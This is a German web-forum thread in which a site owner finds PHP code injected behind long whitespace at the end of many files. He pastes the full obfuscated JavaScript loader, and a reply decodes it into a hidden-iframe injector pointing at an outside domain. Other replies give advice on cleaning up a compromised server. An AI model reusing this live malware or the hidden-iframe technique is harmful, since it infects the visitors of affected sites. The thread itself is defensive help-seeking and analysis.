Ralf: Plötzlich /*a6f227*/ am Dateiende

Hi,

in sehr vielen Datein meiner Website steht plötzlich am Ende:

<?
#a6f227#

#/a6f227#
?>

Dachte ich zumindeset und wunderte mich.
Erst als ich die vermeintlichen fünf "kurzen" Zeilen hier in den Beitrag per c&p kopieren wollte, habe ich gesehen, dass in der vermeintliche leeren Zeile noch eine Menge steht. Nur eben sehr weit rechts, nach vielen Leerzeichen versteckt:

  
<?  
#a6f227#  
                                                                                                                                                                                                                                                                                                                                                              echo "                                                                                                                                                                                                                                                                                                                                                              <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                              if(021===0x11)v=\"va\"+\"l\";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w[\"e\".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113,101,39,58,11,10,31,95,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,95,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,95,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,48,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,50,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,105,101,38,33,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,39,13,9,30,123,12,8,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,96,112,119,96,98,115,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58,11,10);}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r[\"fromCh\"+\"arC\"+((020===0x10)?\"ode\":\"\")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+\"\");}</script>";  
  
#/a6f227#  
?>

Wo kann denn so etwas herkommen und was macht es?

Sollte das erledigt sein, wenn ich alle Dateien davon säubere?

SEHR besorgete Grüße
Ralf

  1. Wo kann denn so etwas herkommen und was macht es?

    Von bösen Eindringlingen. Es dient zum Angriff auf weitere Rechner.

    Sollte das erledigt sein, wenn ich alle Dateien davon säubere?

    Nein. Denn die Quelle des Übels ist nicht beseitigt, Du wirst binnen Stunden wieder fest stellen, dass Deine Dateien diesen oder ähnlichen Code verbreiten.

    Suche Dir fachkundige Hilfe, es ist sehr wahrscheinlich, dass Dein Webserver gehackt wurde. Hierzu ist einiges erforderlich, was Du offensichtlich nicht leisten kannst, sonst hättest Du die Frage nicht gestellt.

    Fred

    1. Suche Dir fachkundige Hilfe,

      Wo?

      1. Wo?

        Wo lässt Du die Bremsen Deines Autos reparieren, wenn Du selbst keine Ahnung hast?

        Und wo findest Du die Adresse?

        Falls Du meinst, Du könntest auch so lassen:

        Fährst Du noch mit einem Auto,  bei dem die Bremsen nicht gehen mit Vmax auf der Autobahn herum?

        Früher oder später wird Deine Seite bei den einschlägigen Diensten gelistet sein und die Zugriffzahlen werden ohnehin gegen Null tendieren.
        Was tust Du Deinen Freunden an, welche Deine Webseite besuchen?

        1. Wo lässt Du die Bremsen Deines Autos reparieren, wenn Du selbst keine Ahnung hast?

          Also sollte ich jetzt nach einem Reparaturdienst für gehackte Server suchen?

          1. Also sollte ich jetzt nach einem Reparaturdienst für gehackte Server suchen?

            Ja.Der Support Deines Hosters wird Dir sehr genau erklären wie Du den schnellstmöglich erreichst. Falls Du in den gelben Seiten suchst: Nimm nichts, was mit mehr als 2 A's anfängt oder eine kostenlose Rufnummer (0800) hat.

            Fred

    2. Hello,

      Suche Dir fachkundige Hilfe, es ist sehr wahrscheinlich, dass Dein Webserver gehackt wurde. Hierzu ist einiges erforderlich, was Du offensichtlich nicht leisten kannst, sonst hättest Du die Frage nicht gestellt.

      Welche Maßnahmen gehören denn alle dazu?
      Vielleicht könnten wir ja mal gemeinsam versuchen, fachkundig zu werden?

      Ich versuche mal einen Anfang:
      Um die Ursachen zu finden und nicht nur einfach Desinfektionsmittel drauzuschütten

      • Zunächst einmal müsste der Host vom (öffentlichen) Netz.

      • Dann müsste man die Datenträger herausnehmen und mittels eines anderen Hosts
          einen Dateivergleich mit einem gleichen, _gesunden_ System vornehmen.
          Hierbei muss der saubere Host möglichst schon gegen Virenbefall geschützt sein.

      • Anschließend kann man versuchen, die Eindringungs-Kanäle herauszufinden und
          zu schließen.

      Bei Verwendung von PHP-Scripten sind dies oft Upload-Formulare für Dateien,
        meistens Bilder, bei denen nicht überprüft wird, ob wirklich ein Bilder in der
        Datei enthalten ist und das Ablageverzeichnis über HTTP zugänglich ist und nicht
        gegen Scriptausführung gesperrt ist!

      • Dann könnte man zusätzlich appArmor oder etwas ähnliches für alle für User
          zugänglichen Bereiche einsetzen.

      • ? mehr Ideen?

      Zum Schluss wieder einen sauberen Host aufsetzen und u.a. die obigen Regeln beachten.

      Liebe Grüße aus dem schönen Oberharz

      Tom vom Berg

      --
       ☻_
      /▌
      / \ Nur selber lernen macht schlau
      http://restaurant-zur-kleinen-kapelle.de
        • ? mehr Ideen?

        Klar. Im vorliegenden Fall mit der Management-Konsole den Server neu aufsetzen. Und natürlich intensiv prüfen, ob der lokale Rechner verseucht ist.

        Hab ich aber schon geschrieben. Macht aber nichts. Steffen hat es auch nicht gelesen.

        Fred

  2. -%-  und was macht es?

    Hallo,

    das Script erzeugt eine Funktion, die eine Seite via IFrame auf der Seite integriert,
    nachfolgend der resultierende Code:

    (function()  
    {  
     var a = document.createElement('iframe');  
      
     a.src = 'http://getyourbet.org';  
     a.style.position = 'absolute';  
     a.style.border = '0';  
     a.style.height = '2px';  
     a.style.width = '2px';  
     a.style.left = '1px';  
     a.style.top = '1px';  
      
     if(!document.getElementById('marwads'))  
     {  
     document.write('<div id=\'marwads\'></div>');  
     document.getElementById('marwads').appendChild(a);  
     }  
    })();
    

    Gruss,
    Worf

    1. Danke!

      das Script erzeugt eine Funktion, die eine Seite via IFrame auf der Seite integriert,
      nachfolgend der resultierende Code:

      (function()

      {
      var a = document.createElement('iframe');

      a.src = 'http://getyourbet.org';
      a.style.position = 'absolute';
      a.style.border = '0';
      a.style.height = '2px';
      a.style.width = '2px';
      a.style.left = '1px';
      a.style.top = '1px';

      if(!document.getElementById('marwads'))
      {
      document.write('<div id='marwads'></div>');
      document.getElementById('marwads').appendChild(a);
      }
      })();

        
      Hat jemand eine Ahnung wie ich mir das Ding evtl. eingefangen habe und wie ich es wieder los werde?  
        
      
      
      1. Hat jemand eine Ahnung wie ich mir das Ding evtl. eingefangen habe und wie ich es wieder los werde?

        Schon zu Punkt 1 braucht es beim von Dir vermittelten Erkenntnisstand eine recht große Glaskugel.

        Vermutlich irgend ein unsicheres gästebuch, Word-Press-Plugin oder was immer. Nicht jeder, der programmiert kann das auch.

        Fred

        1. Vermutlich irgend ein unsicheres gästebuch, Word-Press-Plugin oder was immer.

          Nichts dergleichen gibt es oder gab es jemals auf dieser Site. Alle Eingaben, die User derzeit in Formularfelder machen können, werden überhaupt noch nicht verarbeitet.
          Das Projekt ist im Aufbau, läuft unter einer Domain, die noch nie für etwas "sinnvolles" verwendet wurde, die gesamte Site ist per .htaccess / .htpasswd zugriffsgeschützt.

          Gruß
          Ralf

          1. Das Projekt ist im Aufbau, läuft unter einer Domain, die noch nie für etwas "sinnvolles" verwendet wurde, die gesamte Site ist per .htaccess / .htpasswd zugriffsgeschützt.

            Wenn es denn so ist:

            Hoster kontaktieren (falls kein eigener (V-)Server), aber vorher den eigenen Rechner und den aller Projekteilnehmer checken. Es gab auch schon Trojaner, die haben Dateien unmittelbar vor dem Upload per FTP, SFTP WeDAV oder was immer verändert.

            Außerdem: Alle Passwörter ändern, die könnten inzwischen bekannt sein.

            1. Hoster kontaktieren (falls kein eigener (V-)Server),

              Ist ein Root Server bei 1&1. Die werden mir nicht viel weiter helfen...

              aber vorher den eigenen Rechner

              Bin gerade dabei. Diverse Vierenscanner haben (noch) nichts gefunden.

              und den aller Projekteilnehmer checken.

              Es gibt außer mir keine.

              Es gab auch schon Trojaner, die haben Dateien unmittelbar vor dem Upload per FTP, SFTP WeDAV oder was immer verändert.

              Außerdem: Alle Passwörter ändern, die könnten inzwischen bekannt sein.

              Done.

              1. Ist ein Root Server bei 1&1. Die werden mir nicht viel weiter helfen...

                Du verdienst Dein Geld mit was anderen als Server zu administrieren und sicher nicht ganz wenig, denn Du leistest Dir einen Root-Server ohne diesen  zu benötigen. Das lässt darauf schließen, dass Dein Job eine gewisse Qualifikation, also Wissen erfordert.

                Was würdest Du zu jemanden sagen, der ohne Kenntnisse, nicht mal mit  Grundkenntnissen, versucht Deinen Beruf auszuüben?

                1und1 bietet meines Wissens in der Management-"Konsole" (der Weboberfläche) eine Möglichkeit, den Server neu aufzusetzen. Hätte ich Deinen Server angegriffen, ich hätte mir zuerst eine Hintertür eingebaut durch die ich jederzeit ohne Passwort auf den Server komme. Die Möglichkeiten dazu sind so vielfältig, dass ich diese hier nicht beschreiben kann.

                Fred

              2. Hello,

                aber vorher den eigenen Rechner
                Bin gerade dabei. Diverse Vierenscanner haben (noch) nichts gefunden.

                Mein NOD32 ist da sehr aggressiv und meckert ja sogar über diese Sequenz im HTML, weil ich ihm das bei der Installation so gesagt habe.

                Liebe Grüße aus dem schönen Oberharz

                Tom vom Berg

                --
                 ☻_
                /▌
                / \ Nur selber lernen macht schlau
                http://restaurant-zur-kleinen-kapelle.de
  3. Tach!

    Wo kann denn so etwas herkommen und was macht es?

    Es kann durch einen gehackten FTP/SSH/...-Account kommen, es kann durch eine Sicherheitslücke und durch noch weitere Wege kommen. Was es konkret macht, ist nicht weiter interessant, es macht auf alle Fälle ungewolltes Zeug, Arbeit beim Aufräumen und wenn es hart kommt auch rechtlichen Ärger.

    Eine Möglichkeit (von vielen) eine Spur zu finden ist, das Dateiänderungsdatum anzuschauen und dann die Logfiles für diesem Zeitpunkt auf verdächtige Einträge abzusuchen.

    Sollte das erledigt sein, wenn ich alle Dateien davon säubere?

    Nur wenn der Angreifer nicht wiederkommt, denn mit Löschen allein hast du ja die Ursache nicht beseitigt.

    dedlfix.

    1. Hello,

      das obige Posting wird bei mir als Trojaner eingestuft. Was steht denn da böses drin?

      Liebe Grüße aus dem schönen Oberharz

      Tom vom Berg

      --
       ☻_
      /▌
      / \ Nur selber lernen macht schlau
      http://restaurant-zur-kleinen-kapelle.de
      1. das obige Posting wird bei mir als Trojaner eingestuft. Was steht denn da böses drin?

        Das hat der Worf doch schon ausgeführt.

        Dein Scanner kann nicht "sehen", dass es hier unschädlich ist.

        Fred

  4. Hi Ralf,

    schau Dir mal das an:
    http://www.homepage-forum.de/showthread.php?t=56310

    @ Fred Furunkelstein: Wer nichts zu sagen hat soll schweigen. Diese Klugscheißerei müllt nur das Forum zu.

    So long...
    Steffen

    1. @ Fred Furunkelstein: Wer nichts zu sagen hat soll schweigen. Diese Klugscheißerei müllt nur das Forum zu.

      Ach so? Das ist mir vollkommen neu.

      Fred